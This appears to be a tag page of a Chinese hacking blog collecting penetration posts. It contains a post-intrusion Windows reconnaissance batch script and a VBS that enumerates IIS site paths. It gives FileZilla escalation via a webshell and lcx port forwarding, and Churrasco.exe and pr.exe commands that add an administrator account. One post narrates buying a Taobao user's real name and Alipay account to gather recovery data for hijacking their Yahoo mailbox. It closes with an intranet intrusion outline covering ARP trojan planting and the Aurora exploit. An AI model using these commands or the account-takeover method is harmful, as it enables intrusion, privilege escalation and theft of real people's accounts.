Ψ小川Ψ dě Blog

标签:渗透

提权渗透技巧总结 (下)

收集系统信息的脚本:
for window:
@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with   atq#####
echo schtask /query
echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree -F

提权渗透技巧总结 (上)

旁站路径问题:
1、读网站配置。
2、用以下VBS:

On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then
MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”, 4096, “Lilo”
WScript.Quit
End If
Set objservice = GetObject(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService = GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & “[” & OService.ServerComment & “]”
For Each Binds In OService.ServerBindings
Web = “{ ” & Replace(Binds, “:”, ” } { “) & ” }”
WScript.Echo Replace(Split(Replace(Web, ” “, “”), “}{“)(2), “}”, “”)
Next
WScript.Echo “Path            : ” & VDirObj.Path
End If
Next

FileZilla 提权

拿到一个webshell,想提权,服务器权限设置的不严,但是提权不好提,只有一个C盘,也没装什么软件,没mysql,mssql,su,360等一些熟悉的提权软件。执行下命令看看吧!netstat -an看到有个默认的端口14147网上搜了下原来是一款叫做FileZilla的FTP软件的一个管理端口。

在webshell查看FileZilla的配置文件得到管理用户名和密码

本地监听 lcx -listen 7788 9900,

在虚拟机里进行转发如下图1-2

dff336faa9d5ebc49f51463d

 

Churrasco.exe、pr.exe、ms10048提权

1.Churrasco.exe,是win2003 系统下的一个本地提权0day,通过此工具执行命令即可添加管理用户。

 

使用方法:

Churrasco.exe “net user admin1 admin1 /add && net localgroup administrators admin1 /add”

2.pr.exe 提权Windows跟踪注册表项的ACL权限提升漏洞
Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌,就可以获得SYSTEM级的权限提升。

使用方法:

pr.exe “gets.exe $local”

pr.exe “net user admin1 admin1 /add & net localgroup administrators admin /add”

bb8ac980957c789a9023d9e2

6ecc0fd76367e390a044dfe2

【原创】记一次社工雅虎与淘宝

前几天看上了一淘宝二级域名~大体查看了一下,没找到多少有用信息,索性买点东西吧。于是,花了0.9元买来了一个Q币+淘宝账号主人的真实姓名+支付宝账号。一般支付宝账号都是邮箱,并且这个邮箱很可能也是注册淘宝时用的邮箱。邮箱是雅虎的,看来拿下这个雅虎的邮箱就能得到不少的有效信息~~

雅虎客服…
知道邮箱是哪家的了,下一步就该收集信息了,首先看一下找回雅虎邮箱密码需要什么。两个选项,要么备用邮箱,要么回答问题,看来这两个都很难行的通,只能联系雅虎客服人工审核了。找一下提交资料的地方去看一下。雅虎的没有给出明显的连接,从 雅虎帮助中心>>修改密码保护帮助 >> 问题反馈 可以找到我们要填的表格。这个表格中的项目才是我们要找的资料,大体了解一下。主要有备用邮箱、曾写过的邮编、注册填写的生日、账户注册时间、最后修改密码的时间、密保问题答案等。项目不是很多,雅虎本身已经提供了一点点线索:在找回密码时,选备用邮箱,可以看见雅虎的提示,备用邮箱是@qq.com,呵呵,从淘宝上买过他的东西,要个qq号不难吧~ 在找回密码时选回答问题的时候,雅虎有提示,告诉你设置问题的时间,很多时候设置密保的同时也会修改密码~~记下这个时间备用~

【转】内网渗透实例

目录

一.

本次目标的环境.

1.1       内网网络拓图以及平台介绍.

1.2       渗透测试的目的.

1.3 此次渗透目标内容和范围.

1.4 规避的风险.

二.       此次内网渗透过程.

2.1       内网突破(Socket端口转发以及终端连接).

2.2       系统口令获取,Hash破解,管理软件密码破解.

2.3       社会工程学以及密码习惯组合字典扫描收集管理信息.

2.4       内网常用的IPC$共享入侵.

2.5 ARP嗅探以及ARP挂马突破员工PC.

2.6 ARP内部员工办公系统挂马(Internet Explorer Aurora Exploit 2010-01-17)利用.

2.7 利用同步数据软件进行渗透 .

2.8 利用IIS可写权限配合IIS6.0文件后缀名解析漏洞进行突破.

2.9 利用Windows XP 2K远程,local Exploits,溢出进行权限获取和提升.

3.0 以上方法配合反弹远程控制木马配合.

3.0.1 域内的HASH注入攻击突破(未实现成功)

三.       目标系统安全加固解决办法总结.

3.1 访问控制.

3.2        电信和网络安全.

3.3        安全管理与实践.

3.4    应用和系统开发安全.